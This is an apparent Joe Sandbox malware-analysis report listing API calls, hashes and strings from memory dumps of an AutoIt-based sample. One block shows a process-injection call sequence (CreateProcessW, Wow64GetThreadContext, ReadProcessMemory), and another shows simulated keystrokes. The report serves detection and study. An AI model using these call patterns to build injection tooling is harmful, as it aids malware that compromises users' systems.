                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                            • String ID:
                                                            • API String ID: 1438897964-0
                                                            • Opcode ID: a3ac00fff01ca316bcc29c4708e9ff73ad8aa5bdfaa4624fb4ddface27b7cf64
                                                            • Instruction ID: 37539c4cc2624dfb2c6dbd2fc15eeffed4c46528cedee32ec6ea63b875383793
                                                            • Opcode Fuzzy Hash: a3ac00fff01ca316bcc29c4708e9ff73ad8aa5bdfaa4624fb4ddface27b7cf64
                                                            • Instruction Fuzzy Hash: 5A118C71A08341DFD711EF28DC4591ABBE8EB85750F50856EF0808B2B1DBB09646CB96
                                                            APIs
                                                              • Part of subcall function 0038571C: __FF_MSGBANNER.LIBCMT ref: 00385733
                                                              • Part of subcall function 0038571C: __NMSG_WRITE.LIBCMT ref: 0038573A
                                                              • Part of subcall function 0038571C: RtlAllocateHeap.NTDLL(01630000,00000000,00000001,00000000,?,?,?,00380DD3,?), ref: 0038575F
                                                            • std::exception::exception.LIBCMT ref: 00380DEC
                                                            • __CxxThrowException@8.LIBCMT ref: 00380E01
                                                              • Part of subcall function 0038859B: RaiseException.KERNEL32(?,?,?,00419E78,00000000,?,?,?,?,00380E06,?,00419E78,?,00000001), ref: 003885F0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 3902256705-0
                                                            • Opcode ID: bf535fe6b2d29f5fe73fe1befda017c5b40f1cf14fad56cb385ec20c5ff9e16a
                                                            • Instruction ID: 318c5d5e731fe41b6fef26192fb0546246f95aa7a1db71706a4fd8d4d9a32628
                                                            • Opcode Fuzzy Hash: bf535fe6b2d29f5fe73fe1befda017c5b40f1cf14fad56cb385ec20c5ff9e16a
                                                            • Instruction Fuzzy Hash: 34F0F43540031EA6CB17BBA5EC019EF7BAC9F01310F1004A6FD149A281DFB09A8883D1
                                                            APIs
                                                              • Part of subcall function 00388B28: __getptd_noexit.LIBCMT ref: 00388B28
                                                            • __lock_file.LIBCMT ref: 003853EB
                                                              • Part of subcall function 00386C11: __lock.LIBCMT ref: 00386C34
                                                            • __fclose_nolock.LIBCMT ref: 003853F6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                            • String ID:
                                                            • API String ID: 2800547568-0
                                                            • Opcode ID: 22580836e1cee28497bb39efc7271d78d18f0fd3720244346dc71c0ff3a2b8f1
                                                            • Instruction ID: a87f1ecb5b7b55af8e1c857d4cd5a220cb19d91c3e6b99c2eea45e993a0708cf
                                                            • Opcode Fuzzy Hash: 22580836e1cee28497bb39efc7271d78d18f0fd3720244346dc71c0ff3a2b8f1
                                                            • Instruction Fuzzy Hash: 43F0B431801B049ADB23BF7598067AD7BE06F41375F6582C9E424AF1C1CFFC8A419B52
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 0167082B
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 016708C1
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 016708E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1311110276.000000000166E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0166E000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_166e000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                            • Instruction ID: fc82ff88f358bfe4b734a85c049eb1fe98b8c490a1ffc527bdab885b56a37cae
                                                            • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                            • Instruction Fuzzy Hash: 2B12D024E14658C6EB24DF64D8507DEB232EF69300F1090E9910DEB7A5E77A4F81CF5A
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction ID: 4d7b0a8849ebf0008d9c4bbb4d330e655d8fbd9f62c57faa3419a71fbf22d6f9
                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction Fuzzy Hash: 5131E270A002059FCB9AEF58C494A69F7B6FB49300B2586E5E80ACF751D631EEC5DB80
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: 5fd267d560e21896429c116da98e99c5eaa524eb6c158d503fee6182e208e642
                                                            • Instruction ID: 2ee5b246e636f77ed7685bf23557f6219090282e0d45dbf482b9ed6a9367c98e
                                                            • Opcode Fuzzy Hash: 5fd267d560e21896429c116da98e99c5eaa524eb6c158d503fee6182e208e642
                                                            • Instruction Fuzzy Hash: 754127745047518FDB26DF24C454B1ABBE0BF45318F09C8ACE89A9B766C732E845CF52
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: f1d7be7cac5c32277863267ba6aeac5e7e65b067ee197808cbf6780ae42cdb2b
                                                            • Instruction ID: 9723ef57a606e467007e1a75d087b4233bbe752d0240b076cf5a85b95976760f
                                                            • Opcode Fuzzy Hash: f1d7be7cac5c32277863267ba6aeac5e7e65b067ee197808cbf6780ae42cdb2b
                                                            • Instruction Fuzzy Hash: 1C213672604B09EBDF169F11F8417AA7BB8FB14350F21C46DE486CA194EB3095D0CB49
                                                            APIs
                                                              • Part of subcall function 00364BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00364BEF
                                                              • Part of subcall function 0038525B: __wfsopen.LIBCMT ref: 00385266
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00364E0F
                                                              • Part of subcall function 00364B6A: FreeLibrary.KERNEL32(00000000), ref: 00364BA4
                                                              • Part of subcall function 00364C70: _memmove.LIBCMT ref: 00364CBA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Library$Free$Load__wfsopen_memmove
                                                            • String ID:
                                                            • API String ID: 1396898556-0
                                                            • Opcode ID: c4ae379b7e5c62f9828c55d32478d81b19e148bf9535258a9638f019abbb8fa3
                                                            • Instruction ID: fb2d8bf72d85372810e1b8339cb9e3da24de277cfe77e1771f4808bf14f36c04
                                                            • Opcode Fuzzy Hash: c4ae379b7e5c62f9828c55d32478d81b19e148bf9535258a9638f019abbb8fa3
                                                            • Instruction Fuzzy Hash: 4211E331A00205ABCF13BF70C816FAD77A8AF44710F10C829F541AF1C5DEB29A009BA1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: a43f8f8049fd479b58bf00a574812a689629082e70e6b6088c94004492940c15
                                                            • Instruction ID: f7cd2dded75aecf3129e27e4acb6a248c304ababda98aea73f2a880455e7be0d
                                                            • Opcode Fuzzy Hash: a43f8f8049fd479b58bf00a574812a689629082e70e6b6088c94004492940c15
                                                            • Instruction Fuzzy Hash: A2211374908741DFCB26DF64C454A1ABBE4BF88314F05896CF88A9B762D731E809CF92
                                                            APIs
                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003807B0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: LongNamePath
                                                            • String ID:
                                                            • API String ID: 82841172-0
                                                            • Opcode ID: c88b1d45fa533082644f8eec5a8da90621851afedfa5cc1a530cc671d9e8539b
                                                            • Instruction ID: 933d014c8b5d0bfcb88b19bafd2a9c78d90a05b2f2c92ff0dda46ebec127eadd
                                                            • Opcode Fuzzy Hash: c88b1d45fa533082644f8eec5a8da90621851afedfa5cc1a530cc671d9e8539b
                                                            • Instruction Fuzzy Hash: 3E01D671446944AFD712CB24E8C1EF877E8EF86220B1505E6ED48CBC35C62098D8CB91
                                                            APIs
                                                            • __lock_file.LIBCMT ref: 003848A6
                                                              • Part of subcall function 00388B28: __getptd_noexit.LIBCMT ref: 00388B28
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: __getptd_noexit__lock_file
                                                            • String ID:
                                                            • API String ID: 2597487223-0
                                                            • Opcode ID: 75ef7f13b69a37f5739f69d1e4505f902a8b200fa61a484f09ac1503a6518ff7
                                                            • Instruction ID: 77f984f156d0bbc1a34e58e5152bdc821f53183d951162d0cb54838bc28d98ea
                                                            • Opcode Fuzzy Hash: 75ef7f13b69a37f5739f69d1e4505f902a8b200fa61a484f09ac1503a6518ff7
                                                            • Instruction Fuzzy Hash: 38F0C23190070AEBDF13BFB48C067EE3AA1AF00325F558494F4249E592CB79CA51DF51
                                                            APIs
                                                            • FreeLibrary.KERNEL32(?,?,004252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00364E7E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: c8211da3005f915916b132b824a403448e220528d0430e2290d176c464f6a8a7
                                                            • Instruction ID: 1edd2c9a8ad3afe7e143aee22228db0f724ebc5ceceedf6b616bd719dfda4076
                                                            • Opcode Fuzzy Hash: c8211da3005f915916b132b824a403448e220528d0430e2290d176c464f6a8a7
                                                            • Instruction Fuzzy Hash: BEF01571901B11CFCB369F64E494812BBE5BF14329321CA7EE1D686A24C7739840DB40
                                                            APIs
                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003807B0
                                                              • Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: LongNamePath_memmove
                                                            • String ID:
                                                            • API String ID: 2514874351-0
                                                            • Opcode ID: 4c64a454ed80057744597ffae654d0455b5a149846094e8ba502d7e23e65a2ba
                                                            • Instruction ID: 863b9c71ffb9d930ee4711c2f0b203e07620095b8c090898e79d59ba1bc8a9d9
                                                            • Opcode Fuzzy Hash: 4c64a454ed80057744597ffae654d0455b5a149846094e8ba502d7e23e65a2ba
                                                            • Instruction Fuzzy Hash: BAE0CD369041285BC721D6589C05FFA77DDDF897A0F0442B5FD0CDB248DA609C8086D0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: __wfsopen
                                                            • String ID:
                                                            • API String ID: 197181222-0
                                                            • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                            • Instruction ID: a4d3d7d242977b5a8b57a95baa685f8487ac5c22ea5aac9b9a86dafda0d054ca
                                                            • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                            • Instruction Fuzzy Hash: C5B0927644020C77CE022A82EC02A493B299B41764F408060FB0C1C162AA73A6649A89
                                                            APIs
                                                            • Sleep.KERNELBASE(000001F4), ref: 01671081
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1311110276.000000000166E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0166E000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_166e000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction ID: 88df8f8f3c2bde27b6fd1fa1a85093f13fe3fdc343a5e5bdcba27343327129e9
                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction Fuzzy Hash: 29E0E67494020DDFDB00EFB4DA496AE7FB4EF04301F100161FD05D2281DA309D50CA62
                                                            APIs
                                                              • Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623
                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 003ECB37
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003ECB95
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 003ECBD6
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003ECC00
                                                            • SendMessageW.USER32 ref: 003ECC29
                                                            • _wcsncpy.LIBCMT ref: 003ECC95
                                                            • GetKeyState.USER32(00000011), ref: 003ECCB6
                                                            • GetKeyState.USER32(00000009), ref: 003ECCC3
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003ECCD9
                                                            • GetKeyState.USER32(00000010), ref: 003ECCE3
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003ECD0C
                                                            • SendMessageW.USER32 ref: 003ECD33
                                                            • SendMessageW.USER32(?,00001030,?,003EB348), ref: 003ECE37
                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 003ECE4D
                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 003ECE60
                                                            • SetCapture.USER32(?), ref: 003ECE69
                                                            • ClientToScreen.USER32(?,?), ref: 003ECECE
                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 003ECEDB
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003ECEF5
                                                            • ReleaseCapture.USER32 ref: 003ECF00
                                                            • GetCursorPos.USER32(?), ref: 003ECF3A
                                                            • ScreenToClient.USER32(?,?), ref: 003ECF47
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 003ECFA3
                                                            • SendMessageW.USER32 ref: 003ECFD1
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 003ED00E
                                                            • SendMessageW.USER32 ref: 003ED03D
                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 003ED05E
                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 003ED06D
                                                            • GetCursorPos.USER32(?), ref: 003ED08D
                                                            • ScreenToClient.USER32(?,?), ref: 003ED09A
                                                            • GetParent.USER32(?), ref: 003ED0BA
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 003ED123
                                                            • SendMessageW.USER32 ref: 003ED154
                                                            • ClientToScreen.USER32(?,?), ref: 003ED1B2
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 003ED1E2
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 003ED20C
                                                            • SendMessageW.USER32 ref: 003ED22F
                                                            • ClientToScreen.USER32(?,?), ref: 003ED281
                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 003ED2B5
                                                              • Part of subcall function 003625DB: GetWindowLongW.USER32(?,000000EB), ref: 003625EC
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 003ED351
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                            • String ID: @GUI_DRAGID$F$pbB
                                                            • API String ID: 3977979337-2595871605
                                                            • Opcode ID: 4714859737c231d10407a95a69f7209bff56bb18fe2bedf814b256774a2604d8
                                                            • Instruction ID: f0f56e86ba83f277df28317c02081c8e4a4f6e27bbde4262c5521dddf4c2a8e3
                                                            • Opcode Fuzzy Hash: 4714859737c231d10407a95a69f7209bff56bb18fe2bedf814b256774a2604d8
                                                            • Instruction Fuzzy Hash: 9E42CD342042D1AFDB26DF26C884AAABBE9FF49310F150A29F555CB2F0C771D852DB91
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _memmove$_memset
                                                            • String ID: ]A$3c7$DEFINE$P\A$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_7
                                                            • API String ID: 1357608183-3946336730
                                                            • Opcode ID: 58f90922ac46001c1da9d4a1e1c980be59b8e96707a0f799d06a774d2b12c790
                                                            • Instruction ID: c404c411815d4621a5abf846e174d230fb8318a6e7c93d6c25fc525735fd8ed9
                                                            • Opcode Fuzzy Hash: 58f90922ac46001c1da9d4a1e1c980be59b8e96707a0f799d06a774d2b12c790
                                                            • Instruction Fuzzy Hash: B793B375E00215DBDB26CF58C881BEDB7B1FF48314F25816AEA49EB681E7749E81CB40
                                                            APIs
                                                            • GetForegroundWindow.USER32(00000000,?), ref: 003648DF
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0039D665
                                                            • IsIconic.USER32(?), ref: 0039D66E
                                                            • ShowWindow.USER32(?,00000009), ref: 0039D67B
                                                            • SetForegroundWindow.USER32(?), ref: 0039D685
                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0039D69B
                                                            • GetCurrentThreadId.KERNEL32 ref: 0039D6A2
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0039D6AE
                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0039D6BF
                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0039D6C7
                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 0039D6CF
                                                            • SetForegroundWindow.USER32(?), ref: 0039D6D2
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0039D6E7
                                                            • keybd_event.USER32(00000012,00000000), ref: 0039D6F2
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0039D6FC
                                                            • keybd_event.USER32(00000012,00000000), ref: 0039D701
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0039D70A
                                                            • keybd_event.USER32(00000012,00000000), ref: 0039D70F
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0039D719
                                                            • keybd_event.USER32(00000012,00000000), ref: 0039D71E
                                                            • SetForegroundWindow.USER32(?), ref: 0039D721
